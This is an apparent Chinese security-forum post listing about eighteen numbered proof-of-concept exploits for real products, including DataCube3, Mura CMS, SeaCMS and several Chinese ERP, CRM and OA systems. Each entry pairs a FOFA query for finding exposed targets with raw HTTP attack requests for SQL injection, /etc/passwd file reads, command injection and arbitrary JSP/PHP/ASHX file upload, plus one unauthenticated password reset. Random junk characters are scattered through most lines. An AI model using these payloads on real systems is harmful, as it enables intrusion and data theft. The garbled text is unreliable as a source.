! m. V' b W% ?- H6 ?# s1 V7 g( }% s& c2 ^3 u# I, A
: ^' P" u9 b' x: z8 M) F
186. F-logic DataCube3 SQL注入
- x. {6 N8 M) gCVE-2024-317503 ~- H0 w4 [: s3 E2 T3 d
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统7 D% _% B: d& _2 X5 j3 h
FOFA:title=="DataCube3"1 P7 n5 U' ?( [" c4 }" |' I" Q _0 x
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
! M+ b0 y; F% u1 r" t" WHost: your-ip# F3 }$ L6 U5 I1 s$ @! ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
9 M' F2 i( |4 @- DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
. k$ \. H2 M# ?$ DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 ^5 ^3 x; r( K# Y7 g) f8 tAccept-Encoding: gzip, deflate
+ F3 Q, I) F, k w) FConnection: close9 V: e7 f; C/ m1 u3 A, u2 E
Content-Type: application/x-www-form-urlencoded
' }" ^5 `) |; r% b
5 I8 q# E. Y" u: a0 A4 a1 }$ [req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
" h2 `1 z3 D# Y/ e9 e% k4 i5 v, g1 `. Q, [3 |9 |5 l
5 B/ {. r) j6 ]1 E* o( U187. Mura CMS processAsyncObject SQL注入$ y+ z7 f) {( i4 P
CVE-2024-32640, d0 n! h* a) T3 D* C
FOFA:"Mura CMS"( [# G& ^: _% D1 Y9 ?
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1# L w; r$ t: L" z; H
Host: your-ip
9 Y7 Z$ b V& S( B# WContent-Type: application/x-www-form-urlencoded. M* Z/ P/ q* i
& D+ {5 R1 Y( o0 X* s
- j, W, x* ]$ `" u' bobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=11 l- H. x$ e; l' K
- a) Z0 _1 @. F1 t
! C2 H7 e5 q# r4 l188. 叁体-佳会视频会议 attachment 任意文件读取
9 x+ h+ t( {8 I) m: r. v& Cversion <= 3.9.7! N5 u' R9 M |& F
FOFA:body="/system/get_rtc_user_defined_info?site_id"; ^2 Z: Y5 O) D" A
GET /attachment?file=/etc/passwd HTTP/1.1
& A" O( r( D. ~( L! x7 n3 Y, Z0 dHost: your-ip* \4 u, P! _7 ~, s' P! p. ^5 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 q& A0 W9 p' e5 G. U0 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: B0 F7 ?$ A- N- G9 H5 U% L
Accept-Encoding: gzip, deflate
$ P6 b) g; H3 F- `# C0 ^, k+ D5 lAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 N" D1 h. T1 e# ^Connection: close( ?7 Z+ |+ S' m
# {& N$ a, d8 K `. s% ?/ X! A7 B; s3 R+ H% F3 W
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
% N5 x1 r5 d1 n' }( ~FOFA:app="LANWON-临床浏览系统"
; E2 o3 R) D) c! v# W* o( ]GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
& H) d0 v8 d6 L; b, g2 d3 RHost: your-ip
: d7 V- K9 @, n" [7 q+ k/ cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: X% q3 K8 W: X5 p5 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 |6 Y- Q. G T9 @( l( HAccept-Encoding: gzip, deflate
, M) N$ _' r; N2 f' f+ g/ l: ~Accept-Language: zh-CN,zh;q=0.9
$ Y0 T# X/ o% H2 O8 r) zConnection: close2 }( I4 O R1 m/ F; `
. C$ S. T; V) {$ Y9 `9 z, E
! d7 m$ A9 X5 r190. 短视频矩阵营销系统 poihuoqu 任意文件读取! N& |2 x/ h7 G2 e% c6 d/ d
FOFA:title=="短视频矩阵营销系统"- g5 W& q% V* V) m( w9 I+ P+ I- _
POST /index.php/admin/Userinfo/poihuoqu HTTP/2( J; X) U) r! O2 a1 w5 z
Host: your-ip
! M# l' Q3 J2 Z5 P6 g1 t7 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.365 [6 ^9 y1 x6 ~4 N+ ?( L# h4 z$ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. |: W& A! _! I+ M6 bContent-Type: application/x-www-form-urlencoded2 u, H3 S" a: y9 S
Accept-Encoding: gzip, deflate% P! M2 K7 ^/ \
Accept-Language: zh-CN,zh;q=0.9
2 i6 R7 \ @7 F+ w8 F
/ D6 {3 [/ t7 ?) L& a- Bpoi=file:///etc/passwd8 L6 W& N. Q- d. S
5 J! {4 g1 \/ V. k1 m
' z G) |/ }6 q! ]( u7 @" I) _191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入; Y$ P* y' d4 S7 W6 B' V W, z
FOFA:body="/CDGServer3/index.jsp"
( q5 Q+ o$ T5 C6 b+ W" H0 }4 L' M% JPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
0 W- C1 [0 j/ W$ a1 W" F) WHost: your-ip( B3 k/ @% |* X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& C L4 U M/ Q0 S
Content-Type: application/x-www-form-urlencoded
+ G" i# _9 t- }' |! h
0 Y d/ {4 h" a0 rcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1 {# e3 [/ Q, m" C3 L: d$ v4 G
+ J8 j( i' W& r7 y& Y5 q+ w7 i6 l, B0 n3 H9 B$ E+ Y7 n, c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) \$ r# U8 C @4 E: l Y% x
FOFA:title="用户登录_富通天下外贸ERP"4 k- U$ _* a$ @1 Z6 M/ b7 X5 x
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
* ^: C$ l8 p/ |: ^! eHost: your-ip* l7 W4 Q2 J6 e g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 I% C& {2 J- e6 r+ T0 I$ P
Content-Type: application/x-www-form-urlencoded
- ] O+ c" q* M& p/ f6 H6 v# p$ N& ` T$ K
: r8 h8 t) w, M& A! B8 `$ j& M<% @ webhandler language="C#" class="AverageHandler" %>
/ R6 p: ?4 O: K, Kusing System;
; c0 [6 e" R9 Z- h/ H! ^9 Kusing System.Web;
' L- T% a" y) C9 @# @% Apublic class AverageHandler : IHttpHandler
# W5 t0 W5 ?" v# `6 G" H/ n{0 N- T7 `0 b" r
public bool IsReusable
7 U2 a: a. j: c! O& n* v: e9 m) q{ get { return true; } }/ i* z6 _3 Y1 ]8 T
public void ProcessRequest(HttpContext ctx)
' |' R' k& J" Y: G$ w$ H8 ?) S{% [0 ]+ q- S- A4 Q6 P. e/ K
ctx.Response.Write("test");
. _ S$ `. x# `4 U; i @}( z# j5 t) u( ]/ D7 g
}! [6 Q6 T% }- E. K
7 T& J, `) q, B1 D! s' q
s. N* S/ Q/ o9 ~$ L! [193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
C$ `* o' z* Z) |) oFOFA:body="山石云鉴主机安全管理系统"2 Y! {/ q+ `; z" |
GET /master/ajaxActions/getTokenAction.php HTTP/1.1& J U8 `2 f* K$ K
Host:, G/ \" ?9 U' x. \. H
Cookie: PHPSESSID=2333333333333;( o" s1 q( P" J7 l4 `7 r
Content-Type: application/x-www-form-urlencoded- `2 P/ b5 B2 z' l3 H# L
User-Agent: Mozilla/5.0* w" A$ Z" z) q) l8 w2 t
) y/ {' ?0 b% A% M3 D# m
* R6 a$ C0 j" r3 X2 H' J" MPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.18 ]% |$ v% e. e: E6 `& O
Host:
9 \2 u9 j# `# |$ ZUser-Agent: Mozilla/5.05 D5 ]' ]4 L9 l! s+ i& t9 D. X
Accept-Encoding: gzip, deflate
4 _9 B# m) T2 N- l" s1 n( i+ j, ?5 Q/ R8 ]Accept: */*4 N3 R" s# c! `5 ^% U; e/ J
Connection: close
% D) a; L8 ^1 g( J `4 Z9 F- I1 MCookie: PHPSESSID=2333333333333;
3 w1 f7 j+ G0 w4 \Content-Type: application/x-www-form-urlencoded* ^/ Z1 z, q+ t S1 @' T6 e
Content-Length: 841 v, c/ M# D/ G. @
& {* h, i" x* [8 d3 V+ S' q
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
; S5 ]) o V y4 `* K1 C9 J" c
: ]0 K/ n2 Y, v
8 E, r. E& I* RGET /master/img/config HTTP/1.16 B$ k N+ ?4 e+ g$ G8 e
Host:
- \/ W% Z, i$ O& h3 ^User-Agent: Mozilla/5.0
/ U- x) r, [' T% M' U$ {; e$ H5 I! L. [) Z X6 i
9 K' }4 A9 Q: p. a! d2 x) Y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传8 t3 `) l, C; }8 a Q" |
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在* C6 P+ ~7 z- K4 q
; q& t7 D9 ^$ p5 k1 F# z
POST /servlet/uploadAttachmentServlet HTTP/1.1
$ O0 A6 ~6 h1 D7 t( n" I, jHost: host
) I( @# r/ I3 Q8 H9 N7 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
) g |" B2 G/ X$ S( J- vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; g2 g) z' X$ G0 z" b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 o# O$ h7 F& }5 S! ^( @, wAccept-Encoding: gzip, deflate
7 t! Y! U' p- |( qConnection: close) [1 \# h9 s' k# x* \, _, P7 @5 p# f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 A+ a+ G N. Y3 T6 M2 E- |0 A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- m0 R8 {. [' k
7 D0 i7 E: F F+ y5 ?Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
. |8 r& P; v6 C: {2 d5 `5 wContent-Type: text/plain
6 d( E! I/ C' c" H- h, F$ K. ~: g: N<% out.println("hello");%>
; O/ ~- p* r c------WebKitFormBoundaryKNt0t4vBe8cX9rZk! b5 w! c5 ?2 g+ C7 F
Content-Disposition: form-data; name="json"
4 Y! }$ h+ u# Y5 J {"iq":{"query":{"UpdateType":"mail"}}}: i. k6 s7 s. n5 d; x% T3 T
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
/ j' k9 T8 q- y% D/ l
: E8 e: V2 I: |7 b7 E+ C* i4 g5 Q" r2 G) M' S! L
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行& x8 l0 c6 S3 E( `8 C" B9 T" V
FOFA:title=="飞鱼星企业级智能上网行为管理系统$ v! F8 \( P/ Y a8 l9 o
POST /send_order.cgi?parameter=operation HTTP/1.1& m [1 {& d0 f1 G1 o; w& Z( F; K
Host: 127.0.0.1
, P& g. x; k# q- ?$ p' NPragma: no-cache# h9 g# W L7 p/ c# w
Cache-Control: no-cache
- p2 e" d5 G; b" M" S0 P% }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36& U5 {7 a5 V: I- R7 t$ S
Accept: */*2 z: d9 q9 B3 E7 ]4 K1 {% q1 o$ g( ?
Accept-Encoding: gzip, deflate
& {' I, N' _) M8 Y1 X4 aAccept-Language: zh-CN,zh;q=0.9$ n: f8 _- |% G, v6 \ z9 f
Connection: close9 l; p. j7 W4 J4 p5 z! u
Content-Type: application/x-www-form-urlencoded9 `, k+ k- W8 m( P/ M' D
Content-Length: 68/ X! F7 B0 n9 P2 L3 W# T
9 e8 [1 x/ g2 o. ]! ]
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
5 [1 J# R- e0 \6 W# g& k# C9 c. E! a( |2 u: ?
& O5 |) d2 x4 h3 P$ P8 E
196. 河南省风速科技统一认证平台密码重置
6 G- _2 q( z" h# q) N, _' a& dFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
( U2 U2 M0 J( v4 `- {POST /cas/userCtl/resetPasswordBySuper HTTP/1.1: q8 G K4 T% a7 M' o6 [; h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 p% c: n0 v0 C1 M" n- R* c9 U
Content-Type: application/json;charset=UTF-8/ x$ _4 N) I4 V2 K- N: D
X-Requested-With: XMLHttpRequest
' b' k6 j ^0 N: N GHost:
* I, N6 T) Y' QAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.29 Z9 c" Z- g% m% U6 z( N
Content-Length: 45
* `4 A2 x+ c0 r1 ZConnection: close
1 ] j6 n5 T; I, z* H
# \5 B! l: L7 ^4 S& x2 B0 j{"xgh":"test","newPass":"test666","email":""}
. P. @$ H, @) m9 [$ c2 X
+ M3 W" ]( l! b3 L; P6 y% ^) [7 r' B! r0 d# J! S1 w$ m$ O
! B# A8 X# }! i197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ o$ _1 m" K7 p
FOFA:app="浙大恩特客户资源管理系统"2 K6 n# o' D9 ` v3 @
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
' b0 W6 g+ u+ @Host:
! w4 X9 ~/ A! {- G/ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
2 B$ K8 Q* M" ~, g& y! XAccept-Encoding: gzip, deflate% f0 I3 p! @) r, f; z
Connection: close
( M$ z5 @' Z1 O4 l8 d
& Z. j2 S( K5 C/ C5 V- K6 {6 X2 l% F7 F
% {% f" o) y# L& ?) P7 X# H198. 阿里云盘 WebDAV 命令注入) R8 z( o, s( X# d
CVE-2024-29640# h; U3 v& V3 S. H
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
% |6 i9 d8 O* E1 R9 {* mCookie: sysauth=41273cb2cffef0bb5d0653592624cf64* ?- |4 d8 A6 F. U9 i' O
Accept: */** D7 a" B: u M7 L3 G0 ]1 k
Accept-Encoding: gzip, deflate4 v( J0 l& _' p& v
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.69 o, I+ l! O: {; h
Connection: close1 U' d2 l6 q( z6 Y; O" `. W
% F* ^& ]/ v( Q( Z0 B$ e3 ]+ u
$ A7 Y8 E' H$ e0 L0 N199. cockpit系统assetsmanager_upload接口 文件上传! F) w0 _8 v! E. b) M
# b ]- S6 \9 U- V& U5 Y
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:1 E% R- I. Q2 q- M
GET /auth/login?to=/ HTTP/1.15 t8 C! V. s& e P6 T+ C7 `7 {5 F
" T3 d9 M* A& g- y" o+ \响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
' I, x- h( i" N& T6 T! {% P
X/ Q6 f0 T4 \2.使用刚才上一步获取到的jwt获取cookie:
; M6 g" E( a3 Y4 y, v" B$ g
* u3 E2 {6 L/ C# KPOST /auth/check HTTP/1.1+ e$ B4 m5 z+ x; k; k1 b
Content-Type: application/json
: d$ N' A8 B! ?. O
H' R/ _$ b" y! y; S+ E5 ~7 F{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}" ^& ]+ |5 l6 A8 k( H# A5 \5 p
$ W4 O$ J/ R! ~# F, ~8 g/ y响应:200,返回值:
) M1 L# z. O* X: N9 r7 f8 N, ISet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/" L6 ?! d' S" Q3 k, W
Fofa:title="Authenticate Please!"3 N# q, s; v0 r, a
POST /assetsmanager/upload HTTP/1.1
1 K# f5 L1 Z( eContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
* C3 B( q7 X" eCookie: mysession=95524f01e238bf51bb60d77ede3bea921 u1 d; H, A9 h3 q( i* e4 X! i) O. I
# Q4 ^0 @: J0 X3 j-----------------------------36D28FBc36bd6feE7Fb31 d9 a( H8 q3 E; t4 _- O
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
3 t, h& v l0 ]Content-Type: text/php2 Y( |2 g% [" ?+ `1 K* w" m
3 l1 G! i2 D" f: a* U. ~
<?php echo "tttt";unlink(__FILE__);?>& M P) ]! {# l# x1 \# o
-----------------------------36D28FBc36bd6feE7Fb3
* q" m% m: f: b1 u: \4 v% uContent-Disposition: form-data; name="folder"
! E& d+ x! s3 R |* R1 G- R
8 N! c+ l! |) k' u. T-----------------------------36D28FBc36bd6feE7Fb3--
' H, U4 k3 J- r, }2 m- I/ C
$ q, u( Z+ q- ^8 l8 P6 \: g9 o! v! c/ C; w! z+ \' P* Y, v
/storage/uploads/tttt.php
* u j$ X- N" i) q$ c
" E5 G* Z3 r- P2 f6 [ v200. SeaCMS海洋影视管理系统dmku SQL注入
3 j& [- y5 ?( q+ m+ A2 z2 fFOFA:app="海洋CMS"& q* ?1 [$ ]% Y, ]# I% a( S
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
6 t" ?4 E4 [. r6 ~! nCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
8 _) {* q+ V$ G$ u0 f( MUpgrade-Insecure-Requests: 1
7 l+ A+ g5 D: J$ pCache-Control: max-age=0- b6 J9 A3 d* T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( z- ^- H9 m- h! F, m* U4 X+ VAccept-Encoding: gzip, deflate, }% g, ^# l1 ~0 m9 }7 S$ T' `
Accept-Language: zh-CN,zh;q=0.9
" d I1 [* m! e5 w. J3 A) b( J, O3 Y8 N
" K! X, [7 F% v. L+ y201. 方正全媒体新闻采编系统 binary SQL注入
3 ~+ u+ z5 v+ [FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
, _2 K/ ~; }7 B! U) ]POST /newsedit/newsplan/task/binary.do HTTP/1.1
: M$ g9 W+ k" _& `3 ^7 L* `( VContent-Type: application/x-www-form-urlencoded
; N6 F' n: D& x' t0 s- w" HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 x! {# K5 P% m. r
Accept-Encoding: gzip, deflate5 U' S# G8 M K0 P- u' P$ s
Accept-Language: zh-CN,zh;q=0.9
, I6 {7 m9 `1 IConnection: close: t- `6 h$ z1 O5 I6 b
; D! T; E% g% ~( B& n
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=16 }$ J5 e0 l B" Q5 D
' `. G: ~. Y1 j5 g: l
, E! t3 B/ z, q0 s _& m202. 微擎系统 AccountEdit任意文件上传
) `. C8 M% ]7 lFOFA:body="/Widgets/WidgetCollection/": Z7 R- J) S J+ ~
获取__VIEWSTATE和__EVENTVALIDATION值
' g# ]1 s. {! }/ KGET /User/AccountEdit.aspx HTTP/1.1. e1 \$ y4 O Y
Host: 滑板人之家
/ I! g0 }6 G- o. {1 V% o9 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
& ?4 N* ?* w' }" b2 l- p; |Content-Length: 00 n. O" q( l7 k' y% X% X
; \" U! O' M0 k/ d& k) L7 T' t0 `7 c
' U0 B, [& d. [' j; C
替换__VIEWSTATE和__EVENTVALIDATION值
1 Y t2 L! H9 ?9 A8 |4 [7 F8 a( JPOST /User/AccountEdit.aspx HTTP/1.1
8 ?( w! y, `" b+ a( t2 ~& @% {Accept-Encoding: gzip, deflate, br
) H- F/ K( c9 g9 O: j; _Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
" r$ N; e7 C0 f- C, |& i6 \4 {8 d+ ]8 @
-----------------------------786435874t38587593865736587346567358735687+ A8 c9 j$ u B+ ] L$ s
Content-Disposition: form-data; name="__VIEWSTATE"
8 `# j. X' z3 ] h3 c2 L5 t, v f' C- d* u, V2 }
__VIEWSTATE) K* X- Q8 W2 E) c
-----------------------------786435874t38587593865736587346567358735687
; T/ d; f F/ [/ f9 d, KContent-Disposition: form-data; name="__EVENTVALIDATION"
X2 O/ u/ x+ W: u. Y' Z
6 {/ P/ B }+ h5 ]; B0 Z1 I__EVENTVALIDATION% E# S. p& Y3 G& q8 g8 w2 E
-----------------------------786435874t38587593865736587346567358735687# ~4 o" {: W0 v& _' {* T" ]. Y& [3 s
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
0 j5 m6 G/ b& q# t) dContent-Type: text/plain, V S+ u6 [0 ~) T
7 l0 w3 y3 b g& z' z0 r! ~Hello World! D$ Z; O% n! j$ z9 N2 j
-----------------------------786435874t38587593865736587346567358735687
: Y( ^& Y- t3 }5 f; h; nContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
4 o7 y& N! n3 X6 E+ Q6 I1 z/ p1 k6 o
上传图片+ i1 T! `+ G6 q4 B' i
-----------------------------786435874t38587593865736587346567358735687! Q+ z+ w# J- I$ b$ h4 {0 V( w" ~
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"4 R; c$ I8 I- y( O5 [* N
! K0 o" @1 K1 {" l3 O6 t% A
' \# `# r- J+ \3 [-----------------------------786435874t38587593865736587346567358735687& ^, u0 |% s; A$ L
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"8 w, |6 Z! c& D7 D: y: z
4 m6 S# x8 P& v4 v9 y2 t
8 y: s0 E. M" Q: e3 L5 Y- ?. Z4 w-----------------------------786435874t38587593865736587346567358735687--
2 d+ j2 N: f( N
# j# R `6 f Z7 e% d- t0 B5 f6 X) E6 E( T
/_data/Uploads/1123.txt# D2 c# u8 D" A' ^! \% S* }
! I& m5 P; N5 A! S/ `+ u4 X: K203. 红海云EHR PtFjk 文件上传
1 ~- }8 e+ i0 c8 bFOFA:body="RedseaPlatform"
( B; l) @5 z. k# i' M6 ?* y2 pPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
3 Q% D* a& r6 h% @) v" d' qHost: x.x.x.x
! ?: M6 q" ^0 zAccept-Encoding: gzip
7 I$ N- z3 a7 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- `3 ]4 @( j: u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4: f/ l' l0 O" Z) {
Content-Length: 2107 i* _. r8 V4 m
1 c+ w3 _; U% G. R------WebKitFormBoundaryt7WbDl1tXogoZys4
: J( K+ A) E C( h R2 s {Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
{8 A8 b5 b2 w% @# W" f% @+ mContent-Type:image/jpeg
& \% J9 B. M4 r% l9 b3 O
X" z) ]/ s' F" N<% out.print("hello,eHR");%>2 o% U( L/ q: V9 ~8 _
------WebKitFormBoundaryt7WbDl1tXogoZys4--
% _: U% s+ R! a! e( C/ l, F8 c4 E7 V: x+ W7 V1 |
( v7 Y( D9 O [2 H# Z& d6 d
! ]5 V- M1 J, Z N2 r
u0 ~$ R9 }* K4 L, p* C+ i8 g7 G& N9 s
, r! _0 H9 ]" c7 w |
发表于 2024-6-5 14:31:29
收藏
支持
反对